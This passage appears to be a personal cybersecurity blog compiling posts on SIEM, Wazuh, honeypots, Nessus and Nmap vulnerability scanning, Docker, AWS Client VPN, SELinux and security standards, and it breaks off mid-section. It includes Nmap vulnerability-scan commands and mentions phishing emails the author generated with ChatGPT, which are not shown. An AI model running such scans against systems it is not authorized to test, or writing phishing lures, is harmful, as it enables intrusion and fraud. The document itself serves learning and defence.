
PartyRock.aws: Building Your AI Dreams without Code Hassles

PartyRock.aws is an engaging Amazon Bedrock Playground, serving as an enjoyable and user-friendly generative AI application development tool. This web-based interface empowers users to craft AI-driven apps effortlessly, eliminating the necessity for coding. Grounded in the principle that every creator deserves access to an enjoyable and intuitive tool for app creation, PartyRock provides a gateway to foundation models (FMs) from Amazon Bedrock. This allows users to playfully experiment with prompt engineering, fostering a hands-on learning experience. Additionally, PartyRock extends a no-cost trial for new users, requiring no credit card information. Tailored to facilitate learning of generative AI techniques and capabilities, PartyRock encourages users to explore diverse foundation models, refine their text-based prompting skills, and seamlessly chain prompts together.

Explore the capabilities of PartyRock.aws through the following link, where you’ll find the resume checker app I built:
https://partyrock.aws/u/ezrahall/9a4Zgar86/Resume-Checker

 


Wazuh: Your Gateway to Understanding SIEM

In the ever-evolving landscape of cybersecurity, the need for robust solutions to monitor, detect, and respond to security threats is paramount. Security Information and Event Management (SIEM) tools play a pivotal role in achieving this, and one such tool that has been gaining traction is Wazuh. Whether you’re a cybersecurity enthusiast or a professional just starting to explore the intricacies of SIEM, Wazuh could be your guiding light in understanding and fortifying digital defenses.

What is Wazuh?

At its core, Wazuh is an open-source security information and event management (SIEM) solution. But what sets it apart is its holistic approach to security, combining intrusion detection, vulnerability detection, log analysis, and more into a single, comprehensive platform. Developed on the Elastic Stack (formerly ELK Stack), Wazuh offers a scalable and flexible solution for organizations of all sizes.

Features that Define Wazuh:

  1. Intrusion Detection: Wazuh excels at identifying suspicious activities and potential security breaches by analyzing network traffic, system logs, and application logs.
  2. Log Analysis: The tool aggregates and analyzes logs from various sources, providing valuable insights into the overall security posture of your environment.
  3. Vulnerability Detection: Wazuh actively scans systems for vulnerabilities, ensuring that potential weaknesses are identified and addressed promptly.
  4. Real-time Alerting: Wazuh keeps you in the loop with real-time alerts, allowing you to respond swiftly to emerging threats.
  5. Compliance Management: For organizations dealing with regulatory compliance requirements, Wazuh simplifies the process by offering predefined rule sets and reporting capabilities.

Navigating the SIEM Landscape with Wazuh

User-Friendly Setup:

One of the most significant hurdles for those new to SIEM is the complexity of implementation. Wazuh, however, provides a user-friendly setup that eases the onboarding process. The intuitive web-based interface guides users through installation, configuration, and management, making it accessible even for beginners.

Learning Through Practical Application:

Understanding SIEM is not merely theoretical; hands-on experience is crucial. Wazuh provides an ideal platform for learning by offering practical insights into real-world security scenarios. The tool’s versatility allows users to experiment with different configurations and scenarios, gaining a deeper understanding of how SIEM works in action.
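
For example, once a Wazuh manager is running, getting hands-on can be as simple as enrolling an agent and watching alerts arrive. A minimal sketch, assuming the agent package is already installed and 10.0.0.10 is a placeholder for your manager's IP:

sudo sed -i 's|<address>.*</address>|<address>10.0.0.10</address>|' /var/ossec/etc/ossec.conf   # point the agent at the manager (placeholder IP)
sudo systemctl enable --now wazuh-agent        # start the agent so it begins shipping events
# Then, on the Wazuh manager, watch alerts arrive in real time:
sudo tail -f /var/ossec/logs/alerts/alerts.json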

Community Support and Documentation:

Embarking on a journey to comprehend SIEM can be daunting, but with Wazuh’s active community and comprehensive documentation, the learning curve becomes more manageable. The community is a valuable resource for troubleshooting, sharing best practices, and staying updated on the latest developments.


The Critical Role of GRC in the Cybersecurity Industry

Governance, Risk, and Compliance (GRC) forms the bedrock of a robust cybersecurity framework. The growing importance of GRC in the cybersecurity industry cannot be overstated, and here’s why.

Firstly, GRC provides a structured approach towards managing an organization’s overall governance, risk management, and compliance with regulations. As cyber threats evolve, so too must the strategies to combat them. GRC allows for the establishment of clear cybersecurity policies, ensuring everyone within an organization understands their role in maintaining a secure environment.

Secondly, risk management, a core component of GRC, is crucial in cybersecurity. It involves identifying potential threats, assessing their impact, and implementing measures to mitigate them. By incorporating risk management into their cybersecurity strategies, organizations can prepare for and lessen the effects of a potential cyber attack.

Furthermore, regulatory compliance is an essential aspect of GRC. Non-compliance with data protection and privacy laws can result in heavy fines and reputation damage. GRC ensures organizations adhere to these regulations, minimizing the risk of legal and financial repercussions.

Moreover, GRC encourages a culture of security within an organization. By integrating GRC into daily operations, employees become more aware of their responsibilities in maintaining cybersecurity, creating a proactive rather than reactive approach to threats.

Lastly, with the ever-increasing interconnectivity of systems and reliance on digital infrastructure, the magnitude of potential cyber threats is expanding. GRC provides a cohesive strategy to manage these threats effectively, ensuring the continuous operation and security of an organization’s digital assets.


What is SIEM?

Security Information and Event Management (SIEM) is a system that helps organizations to detect and respond to cybersecurity threats. It works by collecting security data from various sources such as network devices, servers, applications, and other security devices, and analyzing that data for any suspicious activity. The goal is to identify potential security incidents, investigate them, and respond to them quickly before they cause harm to the organization. SIEM solutions also offer capabilities such as threat intelligence, user and entity behavior analytics (UEBA), and compliance reporting.

There are many SIEM solutions available on the market that offer different features and functionalities. Here is a list of some of the leading SIEM solutions:

LogRhythm
IBM QRadar SIEM
Microsoft Azure Sentinel
Securonix
LogPoint
Elastic Stack
Splunk
RSA NetWitness Platform
AT&T Cybersecurity
Sumo Logic
Exabeam

It is essential to evaluate different SIEM solutions based on the organization’s specific needs, budget, and goals. Evaluating SIEM solutions helps organizations select the most effective solution that can reduce risk, enable compliance, and enhance security posture. Moreover, organizations should regularly review their SIEM solutions to ensure that they are up to date with current security trends and evolving threat landscapes. This way, they can continue to enhance their security posture and stay ahead of potential security threats.

Cyber attacks demonstration using Azure Sentinel SIEM
The project below demonstrates how I set up a cloud-based SIEM, along with a virtual machine in the cloud that served as a honeypot. The VM was deliberately left vulnerable and exposed to the internet, and I monitored and logged the attacks coming from IP addresses in countries all over the world. I extracted the failed logon data, ingested it into Azure Sentinel, and presented it on a world map so you can visualize where the attacks were coming from.


Vulnerability management and some of the best tools to use

In today’s increasingly interconnected digital landscape, vulnerability management has become an essential aspect of securing an organization’s network and infrastructure. Vulnerability management refers to the process of identifying, assessing, prioritizing, and mitigating vulnerabilities within an organization’s IT environment. By implementing a robust vulnerability management program, organizations can significantly reduce their risk of falling victim to cyber attacks.

One crucial component of vulnerability management is vulnerability scanning. This involves using specialized software to scan an organization’s systems and networks for known vulnerabilities. Vulnerability scanning tools automate the process of identifying vulnerabilities, making it easier for security teams to detect and remediate them before attackers can exploit them.

Here are some of the best vulnerability scanning tools available:

  1. Nessus: A widely used vulnerability scanner that is particularly well-suited to large-scale environments.
  2. OpenVAS: An open-source vulnerability scanner that offers a powerful set of features and is ideal for small to medium-sized organizations.
  3. Qualys: A cloud-based vulnerability management tool that offers a broad range of capabilities, including vulnerability scanning, asset management, and compliance reporting.
  4. Rapid7: Offers vulnerability scanning and management as part of its comprehensive security suite, which also includes threat intelligence, incident detection and response, and more.
  5. Nmap: While not strictly a vulnerability scanner, Nmap is a powerful network exploration tool that can be used to identify open ports and potential vulnerabilities (see the example scan after this list).
  6. Retina: Offers vulnerability scanning and patch management capabilities, making it an ideal choice for organizations that need an all-in-one solution.
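
As a quick illustration of the Nmap entry above, this is how it might be used for a first-pass look at a single host (the address is a placeholder; only scan systems you are authorized to test):

nmap -sV 192.168.1.50                 # identify open ports and the service versions behind them
nmap -sV --script vuln 192.168.1.50   # run Nmap's vulnerability-detection NSE scripts against the host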

When it comes to vulnerability management, it’s essential to have the right tools at your disposal. By using a combination of vulnerability scanning tools and other security technologies, organizations can effectively manage their risk and protect their assets from cyber threats.

Vulnerability management demonstration using Nessus Essentials
The project below demonstrates how I conducted a credentialed scan to find vulnerabilities and performed remediation to resolve them.
From completing this project, I understood that vulnerability management consists of continuously assessing assets to discover vulnerabilities, remediating them to an acceptable level of risk, and then starting the process over again, making sure the risk stays low or at least at an acceptable level.

 


Qualys free training and certification.

Qualys, a leading provider of cloud-based security and compliance solutions, offers a wide range of free training and certification programs to help users gain the knowledge and skills they need to effectively use the Qualys platform. The training programs are available on the Qualys website and cover topics such as vulnerability management, compliance, and threat protection.

The training programs are designed for both beginners and advanced users and offer a mix of self-paced online courses and instructor-led training sessions. Users can choose from a variety of courses, including Vulnerability Management, Policy Compliance, Web Application Scanning, and Asset Management. Each course is designed to provide a comprehensive understanding of the Qualys platform and its features, as well as practical experience in using the platform to identify vulnerabilities, monitor compliance, and protect against threats.

In addition to the free training programs, Qualys also offers certification programs that enable users to demonstrate their expertise in using the Qualys platform. The certifications are available at various levels, including Certified Vulnerability Management Specialist, Certified Policy Compliance Specialist, and Certified Web Application Scanning Specialist. To earn a certification, users must pass an online exam that tests their knowledge of the Qualys platform and its features.


Docker Fundamentals Course.

I recently completed Adrian Cantrill’s Docker Fundamentals course. It is a comprehensive and in-depth guide to learning Docker, a powerful containerization platform that has revolutionized the way developers build, deploy, and manage applications. The course is designed for both beginners and advanced users and covers everything from the basics of Docker to advanced topics such as networking, security, and orchestration.

One of the key features of this course is its practical approach. Adrian provides step-by-step instructions and real-world examples to help students understand and apply Docker concepts in a meaningful way. Students learn how to install and configure Docker on their local machines, create and manage Docker containers, and work with Docker images. They also learn how to use Docker to deploy and scale applications, and how to troubleshoot common issues that can arise.
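
To give a flavour of that hands-on work (this is a generic sketch, not an excerpt from the course), a basic container lifecycle looks like this:

docker pull nginx:latest                           # download an image from Docker Hub
docker run -d --name web -p 8080:80 nginx:latest   # start a container, mapping host port 8080 to container port 80
docker ps                                          # list running containers
docker logs web                                    # view the container's output
docker stop web && docker rm web                   # stop and remove the container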

Another standout feature of this course is its focus on best practices. Adrian emphasizes the importance of writing clean, efficient Dockerfiles and using appropriate tools and techniques to optimize container performance. He also covers key security considerations, such as configuring Docker to run with minimal privileges and implementing network segmentation to isolate containers.

One of the most compelling aspects of this course is Adrian’s teaching style. He is an engaging and dynamic instructor who is clearly passionate about Docker and containerization. His explanations are clear and concise, and he uses a variety of teaching tools, including diagrams, code snippets, and live demos, to help students understand complex topics.


Why it is important to learn computer networking fundamentals for any IT profession.

Computer networking is the backbone of modern IT infrastructure, and it plays a critical role in supporting communication and data transfer between different devices, systems, and networks. Therefore, understanding the fundamentals of computer networking is essential for any IT professional, regardless of their specialization. Here are a few reasons why:

  1. Communication: Networking is the foundation of communication in modern organizations, and it enables IT professionals to establish and maintain connections between different systems, devices, and users. Understanding how networking protocols, devices, and services work together to facilitate communication is critical for IT professionals to troubleshoot issues and maintain the network’s integrity.
  2. Security: With the increasing prevalence of cyber threats and attacks, it’s critical for IT professionals to understand network security fundamentals. This includes knowledge of various security protocols, authentication methods, and encryption techniques to ensure that the network remains secure from unauthorized access and data breaches.
  3. Troubleshooting: Network issues are a common occurrence, and troubleshooting them requires a deep understanding of networking concepts and protocols. IT professionals need to have the skills to diagnose and resolve network issues quickly to minimize downtime and maintain productivity (see the example commands after this list).
  4. Scalability: As businesses grow, their network infrastructure needs to scale accordingly. Understanding the fundamentals of network architecture, design, and deployment is crucial for IT professionals to ensure that the network can handle increasing traffic and user demands.
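
To make the troubleshooting point concrete, these are the kinds of basic Linux commands an IT professional might reach for first (host names and addresses are placeholders):

ip addr                   # check the machine's interfaces and IP addresses
ping -c 4 8.8.8.8         # test basic reachability to an external host
traceroute example.com    # see the path packets take and where they stall
dig example.com           # confirm DNS resolution is working
ss -tulpn                 # list listening ports and the processes behind them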

Why is cybersecurity training important for career development?

Cybersecurity training is important for career development in today’s digital age because it equips individuals with the skills and knowledge necessary to protect organizations from cyber attacks. With technology becoming more integrated into every aspect of our lives, the risk of cyberattacks is increasing, and this has created a high demand for cybersecurity professionals who can keep networks, systems, and data safe.

One way to gain the skills and knowledge needed for a career in cybersecurity is through training programs. There are many platforms available for cybersecurity training, such as Haiku Pro, TryHackMe, and HackTheBox, which offer a variety of resources for individuals to learn and practice cybersecurity skills. For example, Haiku Pro provides an interactive and engaging learning experience, TryHackMe.com offers simulated real-world scenarios, and HackTheBox.com provides a platform for individuals to test their hacking skills in a legal and safe environment.

Cybersecurity training is not just for individuals who are looking to enter the field, but also for professionals who are already working in the industry. Cyber threats are constantly evolving, and cybersecurity professionals need to keep up with the latest tools and techniques to effectively protect their organizations from attacks. Cybersecurity training helps professionals acquire new skills and stay current on industry developments.

In addition to the technical aspects, cybersecurity training also covers the legal and compliance aspects of the industry. As data protection laws and regulations become more stringent, organizations need to ensure compliance, and cybersecurity professionals need to be familiar with these laws and regulations. Cybersecurity training helps professionals understand the legal and ethical context of their work.

Resources:
https://www.hackthebox.com
https://tryhackme.com
https://haikupro.com


What is ChatGPT?

ChatGPT is a language model that has been trained to generate text based on the input it receives. It is a variant of the GPT-3 model, which is a state-of-the-art language processing system developed by OpenAI. ChatGPT is designed to be able to generate text that is similar to human conversation, allowing it to be used for tasks such as generating responses in a chatbot or generating dialogue in a natural language generation application. Because ChatGPT is a machine learning model, it can continue to improve and become more accurate over time as it is exposed to more data.

Below are a few phishing emails I created using ChatGPT.


What is an API?

In this blog post I will describe what an API is, discuss the Twitter API vulnerability data breach that happened in December 2021, and present my REST API project.

What is an API?

An application program interface (API) is code that allows two software programs to communicate with each other. An API defines the correct way for a developer to request services from an operating system (OS) or other application, and expose data within different contexts and across multiple channels.

Any data can be shared with an application program interface. APIs are implemented by function calls composed of verbs and nouns; the required syntax is described in the documentation of the application being called.

How do APIs work?
The application sending the request is called the client, and the application sending the response is called the server.

APIs are made up of two related elements. The first is a specification that describes how information is exchanged between programs, done in the form of a request for processing and a return of the necessary data. The second is a software interface written to that specification and published.

The software that wants to access the features and capabilities of the API is said to “call” it, and the software that creates the API is said to “publish” it.

APIs authorize and grant access to data that is requested by users and other applications. Access is authenticated to a service or portion of functionality, against predefined roles that govern who or what service can access specific actions or data.

Types of APIs:
– SOAP APIs (Simple Object Access Protocol; uses XML)
– RPC APIs (Remote Procedure Call)
– WebSocket APIs (typically use JSON)
– REST APIs (use HTTP; the most popular and flexible)

Twitter API vulnerability data breach

It was reported that stolen data from 5.4 million Twitter users was leaked online, with more shared privately. This is a good example of how failing to properly secure an API can leak information, and of how threat actors can use it.
Source: https://www.bleepingcomputer.com/news/security/54-million-twitter-users-stolen-data-leaked-online-more-shared-privately/

REST API project

In this REST API project I demonstrated how to retrieve patients' medical records, update patients' personal information (such as address and phone number), add a new patient to the system, and delete existing patients' medical records from the database. I used Postman to send my API requests and to test the code.
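
The requests looked roughly like the following curl equivalents (the endpoint and fields below are hypothetical stand-ins, not the actual project URLs):

curl -X GET https://api.example.com/patients/42        # retrieve a patient's medical record
curl -X POST https://api.example.com/patients \
     -H "Content-Type: application/json" \
     -d '{"name": "Jane Doe", "phone": "555-0100"}'    # add a new patient to the system
curl -X PUT https://api.example.com/patients/42 \
     -H "Content-Type: application/json" \
     -d '{"address": "1 New Street"}'                  # update a patient's personal information
curl -X DELETE https://api.example.com/patients/42     # delete a patient's medical records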


Implementing AWS Client VPN

In this blog post I will showcase how to implement AWS Client VPN.

AWS Client VPN is a fully managed remote-access VPN solution used by your remote workforce to securely access resources within both AWS and your on-premises network. Fully elastic, it automatically scales up or down based on demand. When migrating applications to AWS, your users access them the same way before, during, and after the move. AWS Client VPN, including the software client, supports the OpenVPN protocol.

Step 1 – Create Simple AD instance

In this section I created the Simple AD setup.

-I selected Small (for larger deployments, selecting Large might be a better option).
-For Directory DNS Name, I used: corp.awssimplified.org
-For Directory NetBIOS name, I used: CORP
-I made sure I created a complex password.
-I selected the 2 pre-configured private subnets.

The directory will start provisioning; it will need to complete and move into the Active state before continuing to step 2.

Step 2 – Create RSA server certificate

I will explain how to create the certificate.
As I am using the Windows operating system, these are the steps I followed.
I opened the OpenVPN Community Downloads page, downloaded the Windows installer for my version of Windows, and ran the installer (https://openvpn.net/community-downloads).

I opened the EasyRSA releases page and downloaded the ZIP file for my version of Windows. I extracted the ZIP file and copied the EasyRSA folder to the \Program Files\OpenVPN folder (https://github.com/OpenVPN/easy-rsa/releases).

I opened the command prompt as an administrator, navigated to the \Program Files\OpenVPN\EasyRSA directory, and ran the following commands to open the EasyRSA shell and build the certificates.

EasyRSA-Start                                          # open the EasyRSA 3 shell
./easyrsa init-pki                                     # initialise a new PKI directory
./easyrsa build-ca nopass                              # build the certificate authority (CA)
./easyrsa build-server-full server nopass              # generate the server certificate and key
./easyrsa build-client-full client1.domain.tld nopass  # generate the client certificate and key
exit                                                   # leave the EasyRSA shell

This is where I built the certificates.


Step 3 – Create VPN Endpoint

In this section I created the VPN endpoint.
I typed VPC in the services search box at the top of the screen, right-clicked, and opened it in a new tab.
Under Virtual Private Network (VPN) in the menu on the left, I located and clicked Create Client VPN Endpoint.

For Name Tag I entered: A4L Client VPN.
For Client IPv4 CIDR I entered: 192.168.12.0/22.
For the Server certificate ARN, I selected the server certificate I created in step 2.
Under authentication options, I ticked Use user-based authentication.
I also ticked Active Directory authentication.
For DNS Server 1 IP address and DNS Server 2 IP address, I entered the IP addresses of the directory service instance.

At this stage, the VPN endpoint is ready for configuration in the next step.

 

Step 4 – Configure VPN Endpoint & Associations

I clicked the Associations tab and clicked Associate.
I clicked the VPC dropdown and selected A4L-VPC.
I located the subnet IDs for the 3 private subnets in the A4L VPC.
I clicked Associate, then clicked Close.
From there I had to pause and wait for the state of the VPN endpoint to change from pending-associate to available.


Step 5 – Download, Install & Test

I clicked download client configuration.

I went to aws.amazon.com/vpn/client-vpn-download and downloaded the client for my operating system.

 

I installed the VPN application, started the application, went to manage profiles, and added my profile which I downloaded.

I needed to ensure I authorized the connection, or the VPN would not work.
From the Client VPN console I clicked the Authorization rules tab and clicked Add authorization rule.
For Destination network to enable, I entered 10.16.0.0/16.
For Grant access to, I ticked Allow access to all users.
I then clicked Add authorization rule.


Resource: https://github.com/acantril/learn-cantrill-io-labs/tree/master/aws-client-vpn


The benefits of having a Technical Account Manager

In this blog post I will explain what a Technical Account Manager's responsibilities are and the benefits of having a Technical Account Manager in your organisation.

Technical Account Managers (TAMs) are responsible for managing all the technical aspects of a company's relationship with its clients. Whilst providing top-quality technical service, TAMs assist in strengthening customer relationships and ensuring customer satisfaction. Sometimes, TAMs may work with the product development teams in order to customise products for large sales or for individual customers. TAMs might also demonstrate products to customers and explain how such products meet customers' needs.
Whenever customers agree to purchase a product, the TAM identifies and provides the support and services those customers will need in order to make productive and effective use of the products.
TAMs are responsible for managing ongoing support to customers in order to confirm that the customers continue to make effective use of the company's products. TAMs monitor support requests made by customers to identify any recurring issues and recommend changes to products.
Technical Account Managers hold regular review meetings with customers to discuss any problems and issues, and report back to other members of the account team. They analyse customers' support needs and identify areas where the company can reduce support costs and offer improved service.

Benefits of having a Technical Account Manager

-Better strategic and technical alignment between the TAM and the customer:
  -Providing insight into the company's product roadmap.
  -Identifying technical and business best practices tailored to the customer's organisation.
-Higher return on investment by helping the customer fully leverage all features included in their subscription.
-A customer advocate who:
  -Escalates tickets and issues as necessary.
  -Coordinates within departments to increase visibility and prioritise customers' needs.
  -Assists with crisis and incident management.

 

 


AppArmor vs SELinux

SELinux

SELinux (Security-Enhanced Linux) is a part of the Linux security kernel that acts as a protective agent on servers. In the Linux kernel, SELinux relies on mandatory access controls (MAC) that restrict users to rules and policies set by the system administrator. MAC is a higher level of access control than the standard discretionary access control (DAC), and prevents security breaches in the system by allowing processes to access only the files the administrator pre-approves.

SELinux was initially released as a collaboration between Red Hat and the National Security Agency. SELinux receives periodic updates and additions as new Linux distributions are released. The SELinux kernel separates policy and decisions inside the kernel to distribute levels of protection and prevent a total security breach.

SELinux acts under the least-privilege model. SELinux only grants access if the administrator writes a specific policy to do so.

SELinux modes

There are three modes of SELinux: Enforcing, Permissive and Disabled.

Enforcing mode – is the default mode at installation of SELinux. It will enforce the policies on the system, deny access and log actions.

Permissive mode – is the most commonly used mode for troubleshooting SELinux. In this mode, SELinux is enabled but does not enforce security policies. This means that actions will result in a warning and a log entry for the system administrator.

Disabled mode – means that SELinux is turned off and the security policies do not protect the server.
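
On a system with SELinux installed, the current mode can be checked and switched from the shell, for example:

getenforce           # print the current mode: Enforcing, Permissive, or Disabled
sudo setenforce 0    # drop to Permissive until the next reboot (handy for troubleshooting)
sudo setenforce 1    # switch back to Enforcing
sestatus             # show detailed status, including the loaded policy
# For a persistent change, edit the SELINUX= line in /etc/selinux/config and reboot.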

AppArmor

AppArmor (Application Armor) is a Linux kernel security module that allows the system administrator to restrict programs’ capabilities with per-program profiles. Profiles can allow capabilities like network access, raw socket access, and the permission to read, write, or execute files on matching paths. AppArmor supplements the traditional Unix discretionary access control (DAC) model by providing mandatory access control (MAC). It has been partially included in the mainline Linux kernel since version 2.6.36 and its development has been supported by Canonical since 2009.
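
On distributions that ship AppArmor (such as Ubuntu), the apparmor-utils package provides similar controls from the shell; the profile path below is just an illustrative example:

sudo aa-status                                      # list loaded profiles and whether each is in enforce or complain mode
sudo aa-complain /etc/apparmor.d/usr.sbin.tcpdump   # switch a profile to complain (log-only) mode
sudo aa-enforce /etc/apparmor.d/usr.sbin.tcpdump    # put it back into enforce mode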

AppArmor and SELinux comparison

There are several key differences:

-One important difference is that AppArmor identifies file system objects by path name instead of inode. This means that, for example, a file that is inaccessible may become accessible under AppArmor when a hard link is created to it, while SELinux would deny access through the newly created hard link.

-SELinux and AppArmor also differ significantly in how they are administered and how they integrate into the system.

-Since it endeavors to recreate traditional DAC controls with MAC-level enforcement, AppArmor's set of operations is also considerably smaller than those available under most SELinux implementations. For example, AppArmor's set of operations consists of: read, write, append, execute, lock, and link. Most SELinux implementations support a number of operations orders of magnitude greater than that. For example, SELinux will usually support those same permissions, but also includes controls for mknod, binding to network sockets, implicit use of POSIX capabilities, loading and unloading kernel modules, various means of accessing shared memory, etc.

-There are no controls in AppArmor for categorically bounding POSIX capabilities. Since the current implementation of capabilities contains no notion of a subject for the operation (only the actor and the operation) it is usually the job of the MAC layer to prevent privileged operations on files outside the actor’s enforced realm of control (i.e. “Sandbox”). AppArmor can prevent its own policy from being altered, and prevent file systems from being mounted/unmounted, but does nothing to prevent users from stepping outside their approved realms of control.

-AppArmor configuration is done solely using regular flat files. SELinux (by default in most implementations) uses a combination of flat files (used by administrators and developers to write human-readable policy before it's compiled) and extended attributes.

-SELinux supports the concept of a “remote policy server” (configurable via /etc/selinux/semanage.conf) as an alternative source for policy configuration. Central management of AppArmor is usually complicated considerably since administrators must decide between configuration deployment tools being run as root (to allow policy updates) or configured manually on each server.

 

 


Virtualization vs Containerization

Virtualization

Virtualization helps us to create software-based or virtual versions of a computer resource. These computer resources can include computing devices, storage, networks, servers, or even applications. It allows organizations to partition a single physical computer or server into several virtual machines (VM). Each VM can then interact independently and run different operating systems or applications while sharing the resources of a single computer.

How Does Virtualization Work?

Hypervisor software facilitates virtualization. A hypervisor typically sits on top of an operating system, but we can also have hypervisors that are installed directly onto the hardware. Hypervisors take physical resources and divide them up so that virtual environments can use them.
When a user or program issues an instruction to the VM that requires additional resources from the physical environment, the hypervisor relays the request to the physical system and caches the changes. There are two types of hypervisors: Type 1 (Bare Metal) and Type 2 (Hosted).


The main feature of virtualization is that it lets you run different operating systems on the same hardware. Each virtual machine’s operating system (guest OS) does all the necessary start-up activities such as bootstrapping, loading the kernel, and so on. However, each guest OS is controlled through elevated security measures so that they don’t acquire full access to the underlying OS.

 

Containerization

Containerization is a lightweight alternative to virtualization. This involves encapsulating an application in a container with its own operating environment. Thus, instead of installing an OS for each virtual machine, containers use the host OS.

How Does Containerization Work?
Each container is an executable package of software that runs on top of a host OS. A host can support many containers concurrently. This setup works well in, for example, a microservice architecture environment, because each container runs as a minimal, resource-isolated process that other containers can't access.


1) At the bottom layer, there is physical infrastructure such as CPUs, disk storage, and network interfaces.
2) Above that, there is the host OS and its kernel. The kernel acts as the bridge between the software of the OS and the hardware resources.
3) The container engine and its minimal guest OS sit on top of the host OS.
4) At the very top are the binaries and libraries for each application, and the apps that run in their own isolated user spaces.

Containerization evolved from a Linux feature known as cgroups. It's a feature for isolating and controlling resource usage for an operating system process.
For example, it defines the amount of CPU and RAM, or the number of threads, that a process is entitled to access within the Linux kernel. cgroups later became Linux Containers (LXC), with more advanced features for namespace isolation of components such as routing tables and file systems.
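
Container runtimes expose these cgroup controls directly. For instance, Docker can cap a container's memory and CPU share at launch:

docker run -d --name capped --memory=256m --cpus=0.5 nginx:latest   # limit the container to 256 MB of RAM and half a CPU core
docker stats --no-stream capped                                     # confirm the limits and current usage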

Comparison table

Isolation
Virtualization: Provides complete isolation from the host operating system and the other VMs.
Containerization: Typically provides lightweight isolation from the host and other containers, but doesn't provide as strong a security boundary as a VM.

Operating system
Virtualization: Runs a complete operating system including the kernel, thus requiring more system resources such as CPU, memory, and storage.
Containerization: Runs the user-mode portion of an operating system, and can be tailored to contain just the needed services for your app, using fewer system resources.

Guest compatibility
Virtualization: Runs just about any operating system inside the virtual machine.
Containerization: Runs on the same operating system version as the host.

Deployment
Virtualization: Deploy individual VMs by using hypervisor software.
Containerization: Deploy individual containers by using Docker, or deploy multiple containers by using an orchestrator such as Kubernetes.

Persistent storage
Virtualization: Use a Virtual Hard Disk (VHD) for local storage for a single VM, or a Server Message Block (SMB) file share for storage shared by multiple servers.
Containerization: Use local disks for local storage for a single node, or SMB for storage shared by multiple nodes or servers.

Load balancing
Virtualization: Virtual machine load balancing is done by running VMs on other servers in a failover cluster.
Containerization: An orchestrator can automatically start or stop containers on cluster nodes to manage changes in load and availability.

Networking
Virtualization: Uses virtual network adapters.
Containerization: Uses an isolated view of a virtual network adapter, thus providing a little less virtualization.

 

 


Security Standards, Frameworks and Benchmarks

STIGs Benchmarks – Security Technical Implementation Guides

CIS Benchmarks – CIS Center for Internet Security

NIST – Current FIPS

ISO Standards Catalogue

Common Criteria for Information Technology Security Evaluation (CC) is an international standard (ISO / IEC 15408) for computer security. It allows an objective evaluation to validate that a particular product satisfies a defined set of security requirements.

ISO 22301 is the international standard that provides a best-practice framework for implementing an optimised BCMS (business continuity management system).

ISO 27001 is the international standard that describes the requirements for an ISMS (information security management system). The framework is designed to help organizations manage their security practices in one place, consistently and cost-effectively.

ISO 27701 specifies the requirements for a PIMS (privacy information management system) based on the requirements of ISO 27001. It is extended by a set of privacy-specific requirements, control objectives and controls. Companies that have implemented ISO 27001 will be able to use ISO 27701 to extend their security efforts to cover privacy management.

EU GDPR (General Data Protection Regulation) is a privacy and data protection law that supersedes existing national data protection laws across the EU, bringing uniformity by introducing just one main data protection law for companies/organizations to comply with.

CCPA (California Consumer Privacy Act) is a data privacy law that took effect on January 1, 2020 in the State of California. It applies to businesses that collect California residents’ personal information, and its privacy requirements are similar to those of the EU’s GDPR (General Data Protection Regulation).

Payment Card Industry (PCI) Data Security Standards (DSS) is a global information security standard designed to prevent fraud through increased control of credit card data.

SOC 2 is an auditing procedure that ensures your service providers securely manage your data to protect the interests of your company/organization and the privacy of their clients.

NIST CSF is a voluntary framework primarily intended for critical infrastructure organizations to manage and mitigate cybersecurity risk based on existing best practice.

Landlock LSM (Linux Security Module) is a framework to create scoped access control (sandboxing). Landlock is designed to be usable by unprivileged processes while following the system security policy enforced by other access control mechanisms (DAC, LSM, etc.).

Secure boot is a security standard developed by members of the PC industry to help make sure that a device boots (via its Unified Extensible Firmware Interface (UEFI) BIOS) using only software (such as bootloaders, the OS, UEFI drivers, and utilities) that is trusted by the Original Equipment Manufacturer (OEM).


What is vulnerability management?

Vulnerability management is the process of identifying, evaluating, treating, and reporting on security vulnerabilities in systems and the software that runs on them. Implemented alongside other security tactics, it is vital for organizations to prioritize possible threats and minimize their attack surface.

Vulnerability management software can help automate this process. They’ll use a vulnerability scanner and sometimes endpoint agents to inventory a variety of systems on a network and find vulnerabilities on them. Once vulnerabilities are identified, the risk they pose needs to be evaluated in different contexts so decisions can be made about how to best treat them. For example, vulnerability validation can be an effective way to contextualize the real severity of a vulnerability.

The vulnerability management process can be broken down into the following four steps:

1) Identifying Vulnerabilities
2) Evaluating Vulnerabilities
3) Treating Vulnerabilities
4) Reporting Vulnerabilities

Step 1: Identifying Vulnerabilities

At the heart of a typical vulnerability management solution is a vulnerability scanner. The scan consists of four stages:
1) Scan network-accessible systems by pinging them or sending them TCP/UDP packets.
2) Identify open ports and services running on scanned systems.
3) If possible, remotely log in to systems to gather detailed system information.
4) Correlate system information with known vulnerabilities.
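
The first two stages can be approximated by hand with a network scanner such as Nmap (the addresses are placeholders; scan only networks you are authorized to test):

nmap -sn 10.0.0.0/24   # stage 1: ping sweep to discover live, network-accessible systems
nmap -sV 10.0.0.15     # stage 2: identify open ports and the services running behind them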

Vulnerability scanners are able to identify a variety of systems running on a network, such as laptops and desktops, virtual and physical servers, databases, firewalls, switches, printers, etc. Identified systems are probed for different attributes: operating system, open ports, installed software, user accounts, file system structure, system configurations, and more. This information is then used to associate known vulnerabilities to scanned systems. In order to perform this association, vulnerability scanners will use a vulnerability database that contains a list of publicly known vulnerabilities.

Properly configuring vulnerability scans is an essential component of a vulnerability management solution. Vulnerability scanners can sometimes disrupt the networks and systems that they scan. If available network bandwidth becomes very limited during an organization’s peak hours, then vulnerability scans should be scheduled to run during off hours.

If some systems on a network become unstable or behave erratically when scanned, they might need to be excluded from vulnerability scans, or the scans may need to be fine-tuned to be less disruptive. Adaptive scanning is a new approach to further automating and streamlining vulnerability scans based on changes in a network. For example, when a new system connects to a network for the first time, a vulnerability scanner will scan just that system as soon as possible instead of waiting for a weekly or monthly scan to start scanning that entire network.

Vulnerability scanners aren’t the only way to gather system vulnerability data anymore, though. Endpoint agents allow vulnerability management solutions to continuously gather vulnerability data from systems without performing network scans. This helps organizations maintain up-to-date system vulnerability data whether or not, for example, employees’ laptops are connected to the organization’s network or an employee’s home network. Regardless of how a vulnerability management solution gathers this data, it can be used to create reports, metrics, and dashboards for a variety of audiences.

Step 2: Evaluating Vulnerabilities

